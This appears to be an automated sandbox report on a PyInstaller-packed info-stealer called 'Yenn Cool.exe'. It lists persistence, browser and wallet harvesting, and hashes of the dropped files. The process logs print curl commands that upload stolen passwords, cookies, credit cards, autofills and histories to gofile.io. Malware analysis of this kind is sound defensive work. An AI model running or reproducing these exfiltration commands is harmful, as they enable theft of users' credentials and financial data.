Analysis Overview
SHA256
7050faa77423879af7a746ec4868ca467b26bcbc690c1f240a86ab5a8b01a591
Threat Level: Shows suspicious behavior
The file Yenn Cool.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Drops startup file
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Browser Information Discovery
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
cURL User-Agent
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-12 18:14
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:18
Platform
win11-20241007-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:17
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
112s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe | C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Browser Information Discovery
Suspicious use of WriteProcessMemory
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:17
Platform
win11-20241007-en
Max time kernel
93s
Max time network
126s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe | C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Browser Information Discovery
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI43202\python311.dll
| MD5 | 58e01abc9c9b5c885635180ed104fe95 |
| SHA1 | 1c2f7216b125539d63bd111a7aba615c69deb8ba |
| SHA256 | de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837 |
| SHA512 | cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\base_library.zip
| MD5 | 1df66a5a8d8c7bc333ed59a827e131e3 |
| SHA1 | 614986f57b9922cedf4df5ebadaa10ea307d46d1 |
| SHA256 | 190afb1aa885c2aa3516ab343e35f6b10472f4314492c8c4492c7d0f2add2f80 |
| SHA512 | 6568af0d41b1d2f1d4a75e25705777ec263c4a903db164923f4a10118218270a2b003f16f39ae238fe71f0dc1ad52d0cc1ac93a7bf2c6643d009f825dd00e1aa |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ctypes.pyd
| MD5 | 6114277c6fc040f68d25ca90e25924cd |
| SHA1 | 028179c77cb3ba29cd8494049421eaa4900ccd0e |
| SHA256 | f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656 |
| SHA512 | 76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_bz2.pyd
| MD5 | 4438affaaa0ca1df5b9b1cdaa0115ec1 |
| SHA1 | 4eda79eaf3de614d5f744aa9eea5bfcf66e2d386 |
| SHA256 | ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85 |
| SHA512 | 6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_lzma.pyd
| MD5 | 737119a80303ef4eccaa998d500e7640 |
| SHA1 | 328c67c6c4d297ac13da725bf24467d8b5e982e3 |
| SHA256 | 7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28 |
| SHA512 | 1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\select.pyd
| MD5 | 653bdccb7af2aa9ccf50cb050fd3be64 |
| SHA1 | afe0a85425ae911694c250ab4cb1f6c3d3f2cc69 |
| SHA256 | e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279 |
| SHA512 | 07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_socket.pyd
| MD5 | 64a6c475f59e5c57b3f4dd935f429f09 |
| SHA1 | ca2e0719dc32f22163ae0e7b53b2caadb0b9d023 |
| SHA256 | d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49 |
| SHA512 | cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_queue.pyd
| MD5 | 8bbed19359892f8c95c802c6ad7598e9 |
| SHA1 | 773fca164965241f63170e7a1f3a8fa17f73ea18 |
| SHA256 | 4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065 |
| SHA512 | 22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libcrypto-3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libssl-3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_overlapped.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\pyexpat.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_asyncio.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_brotli.cp311-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\charset_normalizer\md.cp311-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\certifi\cacert.pem
C:\Users\Admin\AppData\Local\Temp\_MEI43202\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_cffi_backend.cp311-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ctr.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ofb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_cfb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Util\_strxor.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_cbc.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ecb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_SHA1.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_BLAKE2s.pyd
C:\Users\Admin\AppData\Local\Tempcstzmbjujy.db
C:\Users\Admin\AppData\Local\Tempcsghutsbrz.db
Analysis: behavioral3
Detonation Overview
Submitted: 2024-11-12 18:14
Reported: 2024-11-12 18:31
Platform: win10ltsc2021-20241023-en
Max time kernel: 582s
Max time network: 442s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4324 wrote to memory of 2124 | N/A | C:\Windows\system32\OpenWith.exe | C:\Windows\system32\NOTEPAD.EXE |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
Network
| Country | Destination | Domain | Proto |